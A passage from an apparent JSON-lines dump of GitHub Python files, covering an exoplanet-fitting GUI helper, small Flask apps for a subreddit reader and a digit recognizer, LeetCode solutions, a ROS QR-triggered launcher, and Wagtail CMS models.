self.use_t0_norm_pr_4.isChecked()],[self.pl_rad_mean_4.value(),self.pl_rad_sigma_4.value(),self.use_pl_rad_norm_pr_4.isChecked()],[self.a_sol_mean_4.value(),self.a_sol_sigma_4.value(),self.use_a_sol_norm_pr_4.isChecked()],\n [self.K_mean_5.value(),self.K_sigma_5.value(),self.use_K_norm_pr_5.isChecked()],[self.P_mean_5.value(),self.P_sigma_5.value(),self.use_P_norm_pr_5.isChecked()], [self.e_mean_5.value(),self.e_sigma_5.value(),self.use_e_norm_pr_5.isChecked()],[self.om_mean_5.value(),self.om_sigma_5.value(),self.use_om_norm_pr_5.isChecked()], [self.ma_mean_5.value(),self.ma_sigma_5.value(),self.use_ma_norm_pr_5.isChecked()],[self.incl_mean_5.value(),self.incl_sigma_5.value(),self.use_incl_norm_pr_5.isChecked()], [self.Omega_mean_5.value(),self.Omega_sigma_5.value(), self.use_Omega_norm_pr_5.isChecked()],[self.t0_mean_5.value(),self.t0_sigma_5.value(), self.use_t0_norm_pr_5.isChecked()],[self.pl_rad_mean_5.value(),self.pl_rad_sigma_5.value(),self.use_pl_rad_norm_pr_5.isChecked()],[self.a_sol_mean_5.value(),self.a_sol_sigma_5.value(),self.use_a_sol_norm_pr_5.isChecked()],\n [self.K_mean_6.value(),self.K_sigma_6.value(),self.use_K_norm_pr_6.isChecked()],[self.P_mean_6.value(),self.P_sigma_6.value(),self.use_P_norm_pr_6.isChecked()], [self.e_mean_6.value(),self.e_sigma_6.value(),self.use_e_norm_pr_6.isChecked()],[self.om_mean_6.value(),self.om_sigma_6.value(),self.use_om_norm_pr_6.isChecked()], [self.ma_mean_6.value(),self.ma_sigma_6.value(),self.use_ma_norm_pr_6.isChecked()],[self.incl_mean_6.value(),self.incl_sigma_6.value(),self.use_incl_norm_pr_6.isChecked()], [self.Omega_mean_6.value(),self.Omega_sigma_6.value(), self.use_Omega_norm_pr_6.isChecked()],[self.t0_mean_6.value(),self.t0_sigma_6.value(), self.use_t0_norm_pr_6.isChecked()],[self.pl_rad_mean_6.value(),self.pl_rad_sigma_6.value(),self.use_pl_rad_norm_pr_6.isChecked()],[self.a_sol_mean_6.value(),self.a_sol_sigma_6.value(),self.use_a_sol_norm_pr_6.isChecked()],\n [self.K_mean_7.value(),self.K_sigma_7.value(),self.use_K_norm_pr_7.isChecked()],[self.P_mean_7.value(),self.P_sigma_7.value(),self.use_P_norm_pr_7.isChecked()], [self.e_mean_7.value(),self.e_sigma_7.value(),self.use_e_norm_pr_7.isChecked()],[self.om_mean_7.value(),self.om_sigma_7.value(),self.use_om_norm_pr_7.isChecked()], [self.ma_mean_7.value(),self.ma_sigma_7.value(),self.use_ma_norm_pr_7.isChecked()],[self.incl_mean_7.value(),self.incl_sigma_7.value(),self.use_incl_norm_pr_7.isChecked()], [self.Omega_mean_7.value(),self.Omega_sigma_7.value(), self.use_Omega_norm_pr_7.isChecked()],[self.t0_mean_7.value(),self.t0_sigma_7.value(), self.use_t0_norm_pr_7.isChecked()],[self.pl_rad_mean_7.value(),self.pl_rad_sigma_7.value(),self.use_pl_rad_norm_pr_7.isChecked()],[self.a_sol_mean_7.value(),self.a_sol_sigma_7.value(),self.use_a_sol_norm_pr_7.isChecked()],\n [self.K_mean_8.value(),self.K_sigma_8.value(),self.use_K_norm_pr_8.isChecked()],[self.P_mean_8.value(),self.P_sigma_8.value(),self.use_P_norm_pr_8.isChecked()], [self.e_mean_8.value(),self.e_sigma_8.value(),self.use_e_norm_pr_8.isChecked()],[self.om_mean_8.value(),self.om_sigma_8.value(),self.use_om_norm_pr_8.isChecked()], [self.ma_mean_8.value(),self.ma_sigma_8.value(),self.use_ma_norm_pr_8.isChecked()],[self.incl_mean_8.value(),self.incl_sigma_8.value(),self.use_incl_norm_pr_8.isChecked()], [self.Omega_mean_8.value(),self.Omega_sigma_8.value(), self.use_Omega_norm_pr_8.isChecked()],[self.t0_mean_8.value(),self.t0_sigma_8.value(), self.use_t0_norm_pr_8.isChecked()],[self.pl_rad_mean_8.value(),self.pl_rad_sigma_8.value(),self.use_pl_rad_norm_pr_8.isChecked()],[self.a_sol_mean_8.value(),self.a_sol_sigma_8.value(),self.use_a_sol_norm_pr_8.isChecked()],\n [self.K_mean_9.value(),self.K_sigma_9.value(),self.use_K_norm_pr_9.isChecked()],[self.P_mean_9.value(),self.P_sigma_9.value(),self.use_P_norm_pr_9.isChecked()], [self.e_mean_9.value(),self.e_sigma_9.value(),self.use_e_norm_pr_9.isChecked()],[self.om_mean_9.value(),self.om_sigma_9.value(),self.use_om_norm_pr_9.isChecked()], [self.ma_mean_9.value(),self.ma_sigma_9.value(),self.use_ma_norm_pr_9.isChecked()],[self.incl_mean_9.value(),self.incl_sigma_9.value(),self.use_incl_norm_pr_9.isChecked()], [self.Omega_mean_9.value(),self.Omega_sigma_9.value(), self.use_Omega_norm_pr_9.isChecked()],[self.t0_mean_9.value(),self.t0_sigma_9.value(), self.use_t0_norm_pr_9.isChecked()],[self.pl_rad_mean_9.value(),self.pl_rad_sigma_9.value(),self.use_pl_rad_norm_pr_9.isChecked()],[self.a_sol_mean_9.value(),self.a_sol_sigma_9.value(),self.use_a_sol_norm_pr_9.isChecked()],\n ]\n return param_nr_priors_gui\n\n \n################### GP ########################\n\ndef gp_rot_params(self):\n\n gp_rot_params = [\n self.GP_rot_kernel_Amp,\n self.GP_rot_kernel_time_sc,\n self.GP_rot_kernel_Per,\n self.GP_rot_kernel_fact\n ]\n\n return gp_rot_params\n\ndef gp_rot_errors_gui(self):\n\n gp_rot_errors_gui = [\n self.err_rot_kernel_Amp,\n self.err_rot_kernel_time_sc,\n self.err_rot_kernel_Per,\n self.err_rot_kernel_fact\n ]\n \n return gp_rot_errors_gui\n\ndef use_gp_rot_params(self):\n use_gp_rot_params = [\n self.use_GP_rot_kernel_Amp,\n self.use_GP_rot_kernel_time_sc,\n self.use_GP_rot_kernel_Per,\n self.use_GP_rot_kernel_fact\n ]\n return use_gp_rot_params\n\n\ndef gp_sho_params(self):\n\n gp_sho_params = [\n self.GP_sho_kernel_S,\n self.GP_sho_kernel_Q,\n self.GP_sho_kernel_omega\n ]\n\n return gp_sho_params\n\ndef use_gp_sho_params(self):\n\n use_gp_sho_params = [\n self.use_GP_sho_kernel_S,\n self.use_GP_sho_kernel_Q,\n self.use_GP_sho_kernel_omega\n ]\n return use_gp_sho_params\n\n\ndef gp_sho_errors_gui(self):\n\n gp_sho_errors_gui = [\n self.err_sho_kernel_S,\n self.err_sho_kernel_Q,\n self.err_sho_kernel_omega\n ]\n \n return gp_sho_errors_gui\n\n\n\ndef tra_gp_rot_params(self):\n\n tra_gp_rot_params = [\n self.tra_GP_rot_kernel_Amp,\n self.tra_GP_rot_kernel_time_sc,\n self.tra_GP_rot_kernel_Per,\n self.tra_GP_rot_kernel_fact]\n\n return tra_gp_rot_params\n\n\ndef use_tra_gp_rot_params(self):\n\n use_tra_gp_rot_params = [\n self.use_tra_GP_rot_kernel_Amp,\n self.use_tra_GP_rot_kernel_time_sc,\n self.use_tra_GP_rot_kernel_Per,\n self.use_tra_GP_rot_kernel_fact\n ]\n\n return use_tra_gp_rot_params\n\n\n\ndef tra_gp_sho_params(self):\n\n tra_gp_sho_params = [\n self.tra_GP_sho_kernel_S,\n self.tra_GP_sho_kernel_Q,\n self.tra_GP_sho_kernel_omega]\n\n return tra_gp_sho_params\n\ndef use_tra_gp_sho_params(self):\n\n use_tra_gp_sho_params = [\n self.use_tra_GP_sho_kernel_S,\n self.use_tra_GP_sho_kernel_Q,\n self.use_tra_GP_sho_kernel_omega]\n\n return use_tra_gp_sho_params\n\n\n################ labels ##########################\n\ndef param_a_gui(self): \n\n param_a_gui = [\n self.label_a1, self.label_a2, self.label_a3, \n self.label_a4, self.label_a5, self.label_a6, \n self.label_a7, self.label_a8, self.label_a9\n ]\n\n return param_a_gui\n\ndef param_mass_gui(self):\n\n param_mass_gui = [\n self.label_mass1, self.label_mass2, self.label_mass3, \n self.label_mass4, self.label_mass5, self.label_mass6, \n self.label_mass7, self.label_mass8, self.label_mass9\n ]\n\n return param_mass_gui\n\n\ndef param_t_peri_gui(self): \n\n param_t_peri_gui = [\n self.label_t_peri1, self.label_t_peri2, self.label_t_peri3, \n self.label_t_peri4, self.label_t_peri5, self.label_t_peri6, \n self.label_t_peri7, self.label_t_peri8, self.label_t_peri9\n ]\n\n return param_t_peri_gui\n\n\ndef planet_checked_gui(self): \n\n planet_checked_gui = [\n self.use_Planet1,self.use_Planet2,self.use_Planet3,\n self.use_Planet4,self.use_Planet5,self.use_Planet6,\n self.use_Planet7,self.use_Planet8,self.use_Planet9\n ]\n\n return planet_checked_gui\n\n\n\n \n\ndef add_rv_error(self): \n add_rv_error = [\n [self.inflate_RV_sigma_1,self.use_inflate_RV_sigma_1],[self.inflate_RV_sigma_2,self.use_inflate_RV_sigma_2],\n [self.inflate_RV_sigma_3,self.use_inflate_RV_sigma_3],[self.inflate_RV_sigma_4,self.use_inflate_RV_sigma_4],\n [self.inflate_RV_sigma_5,self.use_inflate_RV_sigma_5],[self.inflate_RV_sigma_6,self.use_inflate_RV_sigma_6],\n [self.inflate_RV_sigma_7,self.use_inflate_RV_sigma_7],[self.inflate_RV_sigma_8,self.use_inflate_RV_sigma_8],\n [self.inflate_RV_sigma_9,self.use_inflate_RV_sigma_9],[self.inflate_RV_sigma_10,self.use_inflate_RV_sigma_10]\n ]\n \n return add_rv_error\n\n\n\n######################### Arb N-body #################################\n \ndef arb_param_gui(self): \n\n arb_param_gui = [\n self.arb_K_1, self.arb_P_1, self.arb_e_1, self.arb_om_1, self.arb_ma_1, self.arb_incl_1, self.arb_Om_1,\n self.arb_K_2, self.arb_P_2, self.arb_e_2, self.arb_om_2, self.arb_ma_2, self.arb_incl_2, self.arb_Om_2,\n self.arb_K_3, self.arb_P_3, self.arb_e_3, self.arb_om_3, self.arb_ma_3, self.arb_incl_3, self.arb_Om_3,\n self.arb_K_4, self.arb_P_4, self.arb_e_4, self.arb_om_4, self.arb_ma_4, self.arb_incl_4, self.arb_Om_4, \n self.arb_K_5, self.arb_P_5, self.arb_e_5, self.arb_om_5, self.arb_ma_5, self.arb_incl_5, self.arb_Om_5,\n self.arb_K_6, self.arb_P_6, self.arb_e_6, self.arb_om_6, self.arb_ma_6, self.arb_incl_6, self.arb_Om_6,\n self.arb_K_7, self.arb_P_7, self.arb_e_7, self.arb_om_7, self.arb_ma_7, self.arb_incl_7, self.arb_Om_7, \n self.arb_K_8, self.arb_P_8, self.arb_e_8, self.arb_om_8, self.arb_ma_8, self.arb_incl_8, self.arb_Om_8,\n self.arb_K_9, self.arb_P_9, self.arb_e_9, self.arb_om_9, self.arb_ma_9, self.arb_incl_9, self.arb_Om_9,\n ]\n return arb_param_gui\n\n\ndef arb_param_gui_use(self): \n arb_param_gui_use = [\n self.use_arb_Planet_1,self.use_arb_Planet_2,self.use_arb_Planet_3,\n self.use_arb_Planet_4,self.use_arb_Planet_5,self.use_arb_Planet_6,\n self.use_arb_Planet_7,self.use_arb_Planet_8,self.use_arb_Planet_9\n ]\n \n return arb_param_gui_use\n\n\n\n\ndef ttv_data_to_planet(self): \n \n ttv_data_to_planet = [\n self.ttv_data_planet_1,self.ttv_data_planet_2,self.ttv_data_planet_3,self.ttv_data_planet_4,self.ttv_data_planet_5,\n self.ttv_data_planet_6,self.ttv_data_planet_7,self.ttv_data_planet_8,self.ttv_data_planet_9,self.ttv_data_planet_10,\n ]\n \n return ttv_data_to_planet\n\n\ndef use_ttv_data_to_planet(self): \n \n use_ttv_data_to_planet = [\n self.use_ttv_data_1,self.use_ttv_data_2,self.use_ttv_data_3,self.use_ttv_data_4,self.use_ttv_data_5,\n self.use_ttv_data_6,self.use_ttv_data_7,self.use_ttv_data_8,self.use_ttv_data_9,self.use_ttv_data_10,\n ]\n \n return use_ttv_data_to_planet\n","repo_name":"hmtabernero/exostriker","sub_path":"lib/gui_groups.py","file_name":"gui_groups.py","file_ext":"py","file_size_in_byte":34837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"10840932148","text":"import requests\nfrom flask import Flask, render_template, request\nfrom source import myfunc\nimport operator\n\"\"\"\nWhen you try to scrape reddit make sure to send the 'headers' on your request.\nReddit blocks scrappers so we have to include these headers to make reddit think\nthat we are a normal computer and not a python script.\nHow to use: requests.get(url, headers=headers)\n\"\"\"\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'}\n\n\n\"\"\"\nAll subreddits have the same url:\ni.e : https://reddit.com/r/javascript\nYou can add more subreddits to the list, just make sure they exist.\nTo make a request, use this url:\nhttps://www.reddit.com/r/{subreddit}/top/?t=month\nThis will give you the top posts in per month.\n\"\"\"\n\nsubreddits = [\n \"javascript\",\n \"reactjs\",\n \"reactnative\",\n \"programming\",\n \"css\",\n \"golang\",\n \"flutter\",\n \"rust\",\n \"django\"\n]\n\n\napp = Flask(\"DayEleven\")\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/read\")\ndef find():\n read_list=[]\n name_list =[]\n word = request.args\n for a in subreddits:\n if a in word:\n name_list.append(a)\n read_list= myfunc(word)\n sort_list = sorted(read_list, key =(lambda x: x['vote']),reverse=True)\n return render_template(\"read.html\", sort_list = sort_list,name_list = name_list)\n\napp.run(host=\"0.0.0.0\")","repo_name":"cheonjiwan/python_challenge","sub_path":"assignment/Day11.py","file_name":"Day11.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"15568088142","text":"import numpy as np\nfrom numpy.core.fromnumeric import sort\nimport torch\nimport PIL \nimport io, base64\nimport torch.nn as nn\nfrom itertools import islice\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\n\n\ndef take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\nclass CLF(nn.Module):\n def __init__(self):\n super(CLF,self).__init__()\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(320, 50)\n self.fc2 = nn.Linear(50, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, training=self.training)\n x = self.fc2(x)\n return x\n\ndef url_prediction(url):\n im = Image.open(io.BytesIO(base64.b64decode(url.split(',')[1])))\n img = 255- np.array(im.convert(\"L\").resize((28,28)))\n model = CLF()\n model.load_state_dict(torch.load(\"model_weights.pth\"))\n img_t = torch.from_numpy(img).unsqueeze(dim=0).unsqueeze(dim=0).type(torch.float32)\n model.eval()\n prediction = model(img_t)\n prediction_a = {}\n for i in range(len(prediction[0])):\n prediction_a[i] = round(prediction[0][i].item(),3)\n # prediction_a.append(round(prediction[0][i].item(),3))\n return prediction_a\n\n\napp = Flask(__name__)\nCORS(app)\ncors = CORS(app,resources={\n r\"/*\":{\n \"origins\":\"localhost\"\n }\n})\n# @cross_origin(origin='http://localhost')\n# app.config['CORS_HEADERS'] = 'Content-Type', \"\"\n\n\n@app.route(\"/\",methods=[\"POST\"])\ndef index():\n temp = request.json.get(\"url\")\n preds = url_prediction(temp)\n sorted_preds = dict(sorted(preds.items(), key=lambda item: item[1],reverse=True))\n print(sorted_preds)\n # response = jsonify(message=\"Simple server is running\")\n # response.headers.add(\"Access-Control-Allow-Origin\", \"*\")\n top = max(sorted_preds, key=sorted_preds.get)\n return str(top)\n\nif __name__ ==\"__main__\":\n app.run(debug=True)\n\n","repo_name":"hasan-farooq/Digit-Recognizer","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"2847298623","text":"\n# Qus:https://leetcode.com/problems/set-matrix-zeroes/\n\n# --this solution is using extra O(n+m) space\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n\n # with using O(n+m) space\n\n r = set()\n c = set()\n\n n = len(matrix)\n m = len(matrix[0])\n\n for i in range(n):\n for j in range(m):\n if(matrix[i][j] == 0):\n r.add(i)\n c.add(j)\n\n for i in range(n):\n for j in range(m):\n # if any of cur row or col in r or c respectively then make that #elemnt zero\n if(i in r or j in c):\n matrix[i][j] = 0\n\n # print matrix\n\n\n# solution 2 without using extra space\n# solution with constant space and O(n*m*(n+m)) time complexity\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix)\n m = len(matrix[0])\n\n def expend(i, j, d=None):\n\n if(i < 0 or i >= n or j < 0 or j >= m):\n return\n # dont override elemnt which is already 0 as we also\n # need to make its row and col elemnts zero\n if(matrix[i][j] != 0):\n # set that position with the val which is not possible for this #matrix\n matrix[i][j] = None\n\n if(d == None):\n # direct are like left,bottom,right,top (1,2,3,4)\n expend(i, j-1, 1)\n expend(i, j+1, 3)\n expend(i-1, j, 4)\n expend(i+1, j, 2)\n elif(d == 1):\n # expend in left direction\n expend(i, j-1, 1)\n elif(d == 3):\n # expend in right direction\n expend(i, j+1, 3)\n elif(d == 2):\n # expend in bottom direction\n expend(i+1, j, 2)\n else:\n # expend in top direction\n expend(i-1, j, 4)\n\n for i in range(n):\n for j in range(m):\n if(matrix[i][j] == 0):\n expend(i, j)\n #print matrix\n # turn all the none value as 0\n for i in range(n):\n for j in range(m):\n if(matrix[i][j] == None):\n matrix[i][j] = 0\n\n\n# optimize it further to O(n*m)\n\n# solution with constant space and O(n*m*(n+m)) time complexity\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: None Do not return anything, modify matrix in-place instead.\n \"\"\"\n n = len(matrix)\n m = len(matrix[0])\n\n # we are using this variable because for first row and col\n # there is only one pos so we will use this new variable to store first col\n # True if need first col updation\n col1 = False\n\n # update first row and first col for respective cell if any of matrix[i][j]==0\n\n for i in range(n):\n\n # update col1 value if first column cell value is 0\n if(matrix[i][0] == 0):\n col1 = True\n\n for j in range(1, m):\n if(matrix[i][j] == 0):\n matrix[i][0] = matrix[0][j] = 0\n\n # update row value based on first cell or col\n # if first row or col is 0 then update that cell value to 0\n\n for i in range(1, n):\n\n for j in range(1, m):\n if(matrix[i][0] == 0 or matrix[0][j] == 0):\n\n matrix[i][j] = 0\n\n # handle first row\n if(matrix[0][0] == 0):\n for j in range(m):\n matrix[0][j] = 0\n\n # hande first col\n if(col1):\n for i in range(n):\n matrix[i][0] = 0\n","repo_name":"mohitsinghnegi1/CodingQuestions","sub_path":"PlacementSeries/SetMatrixZero.py","file_name":"SetMatrixZero.py","file_ext":"py","file_size_in_byte":4031,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"1417738477","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\nDescription: \nAuthor: yangyuxiang\nDate: 2021-04-21 23:17:04\nLastEditors: yangyuxiang\nLastEditTime: 2021-04-21 23:18:54\nFilePath: /leetcode/141.环形链表.py\n'''\n#\n# @lc app=leetcode.cn id=141 lang=python\n#\n# [141] 环形链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def hasCycle(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n fast = slow = head\n\n while fast and fast.next:\n fast = fast.next.next\n slow = slow.next\n if fast == slow:\n return True\n\n return False\n \n \n \n# @lc code=end\n\n","repo_name":"yangyuxiang1996/leetcode","sub_path":"141.环形链表.py","file_name":"141.环形链表.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"23113403547","text":"#! /usr/bin/env python\n\nimport rospy\nimport roslaunch\nimport std_msgs.msg\nimport std_srvs.srv\n\n\nlaunched = False\nrequestedMode = None\nlaunchRequested = False\nstopRequested = False\n\n\ndef barcode_callback(msg):\n global launched\n global launchRequested\n global stopRequested\n global requestedMode\n\n message = msg.data.lower()\n if not (message in ['qualification_simple', 'qualification_vision', 'demo', 'stop']\n or message.startswith('missions')):\n rospy.logerr('Unknown messages')\n return\n\n if message == 'stop':\n if not launched:\n rospy.logwarn('Not launched yet')\n return\n if stopRequested:\n rospy.logwarn('Stop is already requested')\n return\n stopRequested = True\n return\n\n if launched:\n rospy.logwarn('Already launched')\n return\n if launchRequested:\n rospy.logwarn('Launch is already requested')\n return\n\n requestedMode = message\n launchRequested = True\n\n\ndef stop_notification_callback(req):\n global stopRequested\n stopRequested = True\n return std_srvs.srv.TriggerResponse(True, 'OK')\n\ndef main():\n global launched\n global launchRequested\n global stopRequested\n global requestedMode\n\n rospy.init_node('qr_trigger')\n\n launch = None\n\n rospy.Subscriber('/barcode', std_msgs.msg.String, barcode_callback)\n rospy.Service('global_fsm_finished', std_srvs.srv.Trigger, stop_notification_callback)\n\n rate = rospy.Rate(10)\n\n while not rospy.is_shutdown():\n\n if launchRequested:\n\n if requestedMode in ['qualification_simple', 'qualification_vision', 'demo', 'stop']:\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [\"/home/nvidia/AUV/src/auv_startup/launch/\" +\n requestedMode + \".launch\"])\n rospy.loginfo('Starting launch mode ' + requestedMode)\n launch.start()\n launched = True\n launchRequested = False\n else:\n\n if requestedMode.count(':') == 1:\n mode = requestedMode[:requestedMode.index(':')]\n gate_fsm_mode = requestedMode[requestedMode.index(':')+1:]\n rospy.set_param('/gateFsmMode', gate_fsm_mode)\n\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [\"/home/nvidia/AUV/src/auv_startup/launch/\" +\n mode + \".launch\"])\n rospy.loginfo('Starting launch mode ' + mode)\n rospy.loginfo('Gate FSM mode ' + gate_fsm_mode)\n launch.start()\n launched = True\n launchRequested = False\n else:\n mode = requestedMode[:requestedMode.index(':')]\n gate_fsm_mode = requestedMode[requestedMode.index(':')+1:requestedMode.rfind(':')]\n rospy.set_param('/gateFsmMode', gate_fsm_mode)\n\n drums_enabled = requestedMode[requestedMode.rfind(':')+1:]\n rospy.set_param('/drumsEnabled', drums_enabled)\n\n uuid = roslaunch.rlutil.get_or_generate_uuid(None, False)\n roslaunch.configure_logging(uuid)\n launch = roslaunch.parent.ROSLaunchParent(uuid, [\"/home/nvidia/AUV/src/auv_startup/launch/\" +\n mode + \".launch\"])\n rospy.loginfo('Starting launch mode ' + mode)\n rospy.loginfo('Gate FSM mode ' + str(gate_fsm_mode))\n rospy.loginfo('Drums enabled ' + str(drums_enabled))\n launch.start()\n launched = True\n launchRequested = False\n\n\n elif stopRequested:\n rospy.loginfo('Shutting down launch config...')\n launch.shutdown()\n launched = False\n stopRequested = False\n\n rate.sleep()\n\n\n\nif __name__ == '__main__':\n try:\n main()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"hydronautics-team/AUV","sub_path":"src/auv_startup/scripts/qr_trigger.py","file_name":"qr_trigger.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"14381539806","text":"from typing import List\n\nfrom django.utils.text import slugify\nfrom django.db import models\nfrom wagtail.admin.panels import FieldPanel, MultiFieldPanel\nfrom wagtail.contrib.settings.models import BaseSetting\nfrom wagtail.contrib.settings.registry import register_setting\nfrom wagtail.core.models import Page, TranslatableMixin\nfrom wagtail.documents.models import Document\nfrom wagtail.images.models import Image, AbstractImage, AbstractRendition\n\nfrom mangmap.models.utils import FreeBodyField\n\n\nclass CustomImage(AbstractImage):\n caption = models.TextField(verbose_name=\"Légende et/ou Copyright\", blank=True)\n\n admin_form_fields = Image.admin_form_fields + (\"caption\",)\n\n\nclass CustomRendition(AbstractRendition):\n image = models.ForeignKey(\n CustomImage, on_delete=models.CASCADE, related_name=\"renditions\"\n )\n\n class Meta:\n unique_together = ((\"image\", \"filter_spec\", \"focal_point_key\"),)\n\n\nclass BannerImagePage(Page):\n class Meta:\n abstract = True\n\n banner_image = models.ForeignKey(\n CustomImage,\n verbose_name=\"Bandeau\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n\n content_panels = Page.content_panels + [\n FieldPanel(\"banner_image\"),\n ]\n\n\nclass ContentPage(BannerImagePage, FreeBodyField):\n class Meta:\n verbose_name = \"Page de contenu\"\n verbose_name_plural = \"Pages de contenu\"\n\n subpage_types: List[str] = [\"ContentPage\"]\n\n show_in_footer = models.BooleanField(\n verbose_name=\"Faire apparaître dans le bas de page\",\n default=False,\n help_text=\"Si un lien vers cette page devra \\\n apparaître dans le bas de page\",\n )\n\n content_panels = BannerImagePage.content_panels + FreeBodyField.panels\n\n promote_panels = Page.promote_panels + [\n MultiFieldPanel(\n [\n FieldPanel(\"show_in_footer\"),\n ],\n heading=\"Pour le bas de page du site\",\n ),\n ]\n\n\nclass Tag(models.Model):\n name = models.CharField(verbose_name=\"Nom\", max_length=100)\n slug = models.SlugField(\n verbose_name=\"Slug\",\n max_length=100,\n allow_unicode=True,\n blank=True,\n help_text=\"ce champ est rempli automatiquement s'il est laissé vide\",\n )\n\n def __str__(self):\n return self.name\n\n class Meta:\n abstract = True\n\n def save(self, *args, **kwargs):\n if not self.slug:\n self.slug = slugify(self.name)\n super().save(*args, **kwargs)\n\n\nclass SiteType(TranslatableMixin, Tag):\n class Meta(TranslatableMixin.Meta):\n ordering = (\"name\",)\n verbose_name = \"Type de site\"\n verbose_name_plural = \"Types de site\"\n\n\nclass ActualityType(TranslatableMixin, Tag):\n class Meta(TranslatableMixin.Meta):\n ordering = (\"name\",)\n verbose_name = \"Type d'actualité\"\n verbose_name_plural = \"Types d'actualité\"\n\n\nclass Thematic(TranslatableMixin, Tag):\n class Meta(TranslatableMixin.Meta):\n verbose_name = \"Thématique\"\n verbose_name_plural = \"Thématiques\"\n\n icon = models.ForeignKey(Document, on_delete=models.SET_NULL, null=True, blank=True)\n\n @property\n def icon_or_default(self):\n if self.icon:\n return self.icon.url\n else:\n return f\"/static/img/thematics/{self.slug}.svg\"\n\n def to_dict(self):\n to_return = {\"name\": self.name, \"slug\": self.slug, \"icon\": self.icon_or_default}\n\n return to_return\n\n\n@register_setting\nclass StructureSettings(BaseSetting):\n plateformUrl = models.URLField(\n verbose_name=\"Lien de la plateforme\",\n max_length=300,\n blank=True,\n null=True,\n )\n\n linkedin = models.URLField(\n help_text=\"URL de votre page LinkedIn\", blank=True, null=True\n )\n\n class Meta:\n verbose_name = \"Paramètre de la structure\"\n\n\n@register_setting\nclass AnalyticsScriptSetting(BaseSetting):\n script = models.TextField(\n help_text=\"Script d'analytics\",\n blank=True,\n null=True,\n )\n\n class Meta:\n verbose_name = \"Script de suivi du traffic\"\n\n\nclass Contact(models.Model):\n firstname = models.CharField(max_length=50)\n email = models.CharField(max_length=50)\n country = models.CharField(max_length=50)\n lastname = models.CharField(max_length=50)\n subject = models.CharField(max_length=40)\n message = models.TextField()\n","repo_name":"TelesCoop/mangroves","sub_path":"mangmap/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"23835722438","text":"import random\nimport fancy_print as fp\ndef stats():\n final=[]\n for i in range(6):\n results=[]\n for i in range(4):\n num=random.randint(1,6)\n results.append((num-10)%2)\n results.remove(min(results))\n final.append(sum(results))\n return final\n\n\ndef start_game():\n fp.f_print(\"What is your character's name? \")\n player_name=input(\"\")\n player_stats={}\n stat_types=[\"Attack\",\"Defence\",\"Health\",\"Magic Attack\",\"Magic Defence\",\"Hit Chance\"]\n num_choices=stats()\n\n for item in stat_types:\n print_nums=\"\"\n for nums in num_choices:\n print_nums+=str(nums)+\" \"\n fp.f_print(print_nums)\n while True:\n fp.f_print(\"Type which number you would like to use as a bonus to \"+item+\": \")\n selected_num=int(input(\"\"))\n if selected_num in num_choices:\n num_choices.remove(selected_num)\n player_stats[item]=selected_num\n break\n else:\n fp.f_print(\"That number is not available.\")\n return[player_name, player_stats]","repo_name":"AlexRylatt/apcsp-final-project","sub_path":"Player_Start.py","file_name":"Player_Start.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"506909860","text":"\"\"\"\nDjango utils for Seralization\n\"\"\"\n\n\ndef tbl_serialize(model, dataType, filterQ=None):\n \"\"\"\n Serialize Data in Database Table\n \"\"\"\n \n from django.core.serializers import serialize\n from glass.pys import __import\n \n app_mdl = model.split('_')\n app, mdl = app_mdl[0], '_'.join(app_mdl[1:])\n djgMdl = __import('{}.models.{}'.format(app, mdl))\n \n dataType = 'geojson' if dataType == 'gjson' or dataType == 'geojson' \\\n else 'json'\n \n if filterQ:\n data = serialize(dataType, djgMdl.objects.filter(**filterQ))\n else:\n data = 